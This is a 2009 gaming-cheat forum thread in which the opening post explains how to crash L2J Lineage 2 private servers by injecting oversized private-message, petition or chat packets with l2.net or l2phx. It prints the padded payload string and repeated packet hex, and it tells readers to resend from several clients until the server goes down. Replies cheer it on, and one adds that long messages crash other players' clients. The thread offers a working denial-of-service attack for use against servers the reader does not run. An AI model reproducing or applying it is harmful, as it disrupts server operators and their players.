[SHARE]Crashing L2J servers. Simple but deadly.

mpj123 · March 6, 2009

Hurry and patch your servers! Lol.

Step One, Download either phx, l2.net or any program that can inject packets.

(This tutorial will be done with l2.net)

Step two, figuring out the weak point.

Try out every chat option and figure out which ones don't have a character limit. Most l2j servers have normal chat and shout limited. For me, I simply needed to pm someone with a large amount of characters.

"noob gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggAAAAAAAAAAAAAAAAAAAAAAAAAWWWWWWWWWWWWWWWWWWWWWEEEEEEEEEEEEEEEE

! gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggAAAAAAAAAAAAAAAAAAAAAAAAAWWWWWWWWWWWWWWWWWWWWWEEEEEEEEEEEEEEEE

# gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggAAAAAAAAAAAAAAAAAAAAAAAAAWWWWWWWWWWWWWWWWWWWWWEEEEEEEEEEEEEEEE

@ gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggAAAAAAAAAAAAAAAAAAAAAAAAAWWWWWWWWWWWWWWWWWWWWWEEEEEEEEEEEEEEEE

etc.

If the characters get cur off, then you know that chat filter is working and you wont be able to crash the server with that chat option.

Example, lets say the pms weren't patched (all l2j server packs dont have this patched at first if I remember correctly.)

Simply copy paste this into the l2.net chat window and tada! You should get disconnected as well, because your client will work hard to send this message. The server will go into a lockdown because it is trying to decrypt the message and cause every one else to lag. Keep loging into OOG l2.net and pasting this packet until the server crashes. It took me 5 messages with 5 different clients to crash my server. (l2inc)

"SomeRandomNub gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg

You could even try gm petition systems as well. (Petition worked on l2inc, this is why the server was crashing alot last night. Its fixed now.)

With l2phx, You'll need to capture the packet, for example, firstly send something simple such as aaaaaaaaa, this should come up with XX 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00

copy 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 over and over again to make the packet bigger.

XX 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00

NOTE, XX is the packet lenght, this is calculated automatically with l2.net, with l2phx, you might need to figure it out by yourself.

NOTE2, The amount of characters has to exceed the amount the l2j server can buffer. Default is something low like 4 k.... l2.net can take up to like 50k.

Credits to Test from ltwonet.com for the idea, I simply took it a few notches bigger, specially with my auto-pm script. That really caused some damage :P

DreaM · March 6, 2009

I think you should hide for a bit more posts, since there are a lot of leechers i don't wanna see it fixed.

blubb · March 6, 2009

nice post.

tried it out but it doesnt works on my server or i did something wrong

Deanok · March 6, 2009

Already Posted by Dragoniux. Topic should be locked and post account = 250.

Fragas · March 6, 2009

this is for l2net, mine is for phx.

Armind · March 6, 2009

thx for share.. muhahaha

Vago · March 6, 2009

Oh nice one...I already fixed that on my server xD

mpj123 · March 6, 2009

dragoniux's is similar but this is for l2.net and I explain exactly what I'm doing and why its working. I'll raise the post count to 250.

WebM0nst3r · March 6, 2009

it's really cool.

L2 client can accept only 100 characets, so when you send more than 100 characters to client every person who see the message get a critical error ;)

EtEяNiTy™ · March 6, 2009

nice work-really impressing thought I wouldnt ever crash a server. Those who do these kinds of things are jealous of other people.

DreaM · March 6, 2009

what is l2.net?

a program

nice work-really impressing thought I wouldnt ever crash a server. Those who do these kinds of things are jealous of other people.

we are max cheaters unlike you.

™Dariuse® · March 6, 2009

NICE mpj123 now you hide .....250 posts need to see but i see it..Gj

what is l2.net?

hahahha Professional Cheater and don't know what is l2net. pfffff ...YOU ARE A Professional Cheater on forum,but don't know some programs...

Lain · March 6, 2009

Thanks mpj123! I'll try this on L2J Interlude.

And you guys, stop that hardcore flame. :<

mpj123 · March 6, 2009

virusa banned, -4 karma and still flamming.

This is similar to dragonix, but my main focus and selling point was that this was done through pms. And a large number of characters to overwhelm the l2j server's buffer and crash the server.

I personally dont like these kinds of exploits. Was kinda just a fluke that I found it/tested it. I'd rather see servers getting it patched then 1000 people using it to constantly crash servers.

[SHARE]Crashing L2J servers. Simple but deadly.

Recommended Posts

mpj123

DreaM

blubb

Deanok

Fragas

Armind

Vago

mpj123

WebM0nst3r

EtEяNiTy™

DreaM

™Dariuse®

Lain

mpj123

Join the conversation

Posts

Topics

Browse

Activity

Store